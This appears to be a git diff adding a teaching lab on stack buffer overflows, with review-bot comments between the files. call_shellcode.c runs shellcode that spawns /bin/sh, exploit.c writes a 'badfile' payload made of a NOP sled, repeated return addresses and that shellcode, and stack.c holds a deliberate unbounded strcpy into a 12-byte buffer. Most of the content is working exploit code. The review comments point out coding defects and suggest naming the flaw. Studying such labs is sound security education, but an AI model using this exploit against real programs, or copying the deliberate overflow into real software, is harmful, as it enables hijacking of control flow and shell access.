diff --git a/.vscode/settings.json b/.vscode/settings.json
new file mode 100644
index 0000000..691a8f6
--- /dev/null
+++ b/.vscode/settings.json
@@ -0,0 +1,3 @@
+{
+ "C_Cpp.errorSquiggles": "Disabled"
+}
\ No newline at end of file
diff --git a/buffer_overflow_example/demeter/call_shellcode.c b/buffer_overflow_example/demeter/call_shellcode.c
new file mode 100644
index 0000000..00c8483
--- /dev/null
+++ b/buffer_overflow_example/demeter/call_shellcode.c
@@ -0,0 +1,27 @@
+/* call_shellcode.c */
+
+/* This program will create a file containing code for launching a shell */
+
+#include
+#include
+
+const char code[] =
+ "\x31\xc0" /* xorl %eax,%eax */
+ "\x50" /* pushl %eax */
+ "\x68""//sh" /* pushl $0x68732f2f */
+ "\x68""/bin" /* pushl $0x6e69622f */
+ "\x89\xe3" /* movl %esp,%ebx */
+ "\x50" /* pushl %eax */
+ "\x53" /* pushl %ebx */
+ "\x89\xe1" /* movl %esp,%ecx */
+ "\x99" /* cdq */
+ "\xb0\x0b" /* movb $0x0b,%al */
+ "\xcd\x80" /* int $0x80 */
+;
+
+int main(int argc, char **argv)
+{
+ char buf[sizeof(code)];
+ strcpy(buf, code);
+ ((void(*)( ))buf)( );
+}
\ No newline at end of file
diff --git a/buffer_overflow_example/demeter/exploit.c b/buffer_overflow_example/demeter/exploit.c
new file mode 100644
index 0000000..6465cec
--- /dev/null
+++ b/buffer_overflow_example/demeter/exploit.c
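Review bot: The header comment of call_shellcode.c says the program "will create a file", but `main` only copies `code` into the stack array `buf` with `strcpy` and calls it through a function-pointer cast; nothing is written to disk. I would replace it with `/* Copies the byte string into a stack buffer and transfers control to it. */` and add that the call can only succeed when the stack is executable, which hardened default builds do not allow. The two `#include` lines show no header names in this view, so confirm that `<string.h>` is among them for `strcpy`.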
@@ -0,0 +1,69 @@
+//exploit.c
+#include
+#include
+#include
+#define DEFAULT_OFFSET 350
+
+char code[]=
+"\x31\xc0"
+"\x50"
+"\x68""//sh"
+"\x68""/bin"
+"\x89\xe3"
+"\x50"
+"\x53"
+"\x89\xe1"
+"\x99"
+"\xb0\x0b"
+"\xcd\x80"
+;
+
+unsigned long get_sp(void)
+{
+ __asm__("movl %esp,%eax");
+}
+
+void main(int argc, char **argv)
+{
+char buffer[517];
+FILE *badfile;
+char *ptr;
+long *a_ptr,ret;
+
+int offset = DEFAULT_OFFSET;
+int codeSize = sizeof(code);
+int buffSize = sizeof(buffer);
+
+if(argc > 1) offset = atoi(argv[1]); //this allows for command line input
+
+ptr=buffer;
+a_ptr = (long *) ptr;
+
+/* Initialize buffer with 0x90 (NOP instruction) */
+memset(buffer, 0x90, buffSize);
+
+//----------------------BEGIN FILL BUFFER----------------------\\
+
+ret = get_sp()+offset;
+ printf("Return Address: 0x%x\n",get_sp());
+ printf("Address: 0x%x\n",ret);
+
+ptr = buffer;
+ a_ptr = (long *) ptr;
+
+int i;
+for (i = 0; i < 300;i+=4)
+ *(a_ptr++) = ret;
+
+for(i = 486;i < codeSize + 486;++i)
+ buffer[i] = code[i-486];
+
+buffer[buffSize - 1] = '\0';
+//-----------------------END FILL BUFFER-----------------------\\
+
+
+/* Save the contents to the file "badfile" */
+badfile = fopen("./badfile", "w");
+fwrite(buffer,517,1,badfile);
+fclose(badfile);
+}
\ No newline at end of file
diff --git a/buffer_overflow_example/demeter/stack.c b/buffer_overflow_example/demeter/stack.c
new file mode 100644
index 0000000..6a954e3
--- /dev/null
+++ b/buffer_overflow_example/demeter/stack.c
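Review bot: `fopen("./badfile", "w")` at the end of `main` in exploit.c is used unchecked, so a failed open hands NULL to `fwrite` and `fclose`; guard it with `if (badfile == NULL) { perror("badfile"); return; }`. The same unchecked `fopen` is in `main` of stack.c, where the `fread` count is also ignored. Both `printf` calls pass an `unsigned long`/`long` to `%x`; `%lx` matches the argument type. The two banner comments end in `\\`, which splices the following line into the comment; that is harmless here only because the next line is blank, and GCC reports it under `-Wcomment`, so I would drop the trailing backslashes.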
@@ -0,0 +1,29 @@
+/* stack.c */
+
+/* This is the program that introduces the buffer overflow vulnerability. */
+#include
+#include
+#include
+
+int bof(char *str)
+{
+ char buffer[12];
+
+ /* Can you spot the buffer overflow here? ;-) */
+ strcpy(buffer, str);
+
+ return 1;
+}
+
+int main(int argc, char **argv)
+{
+ char str[517];
+ FILE *badfile;
+
+ badfile = fopen("badfile", "r");
+ fread(str, sizeof(char), 517, badfile);
+ bof(str);
+
+ printf("Returned Properly\n");
+ return 1;
+}
\ No newline at end of file
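Review bot: `fread` in `main` fills `str` with up to 517 raw bytes and nothing appends a terminator, so `strcpy(buffer, str)` in `bof` copies until it happens to meet a zero byte, running past the 12-byte `buffer` and possibly past `str` itself. Since the overflow is the stated purpose of this file, I would keep the code and extend the comment in `bof` to name the defect class (CWE-121, stack-based buffer overflow) and show the bounded form used in production code, `snprintf(buffer, sizeof buffer, "%s", str);`, with `str` terminated from the `fread` count. `main` also ends with `return 1;` on the success path, which a shell reads as failure; `return 0;` is the conventional value.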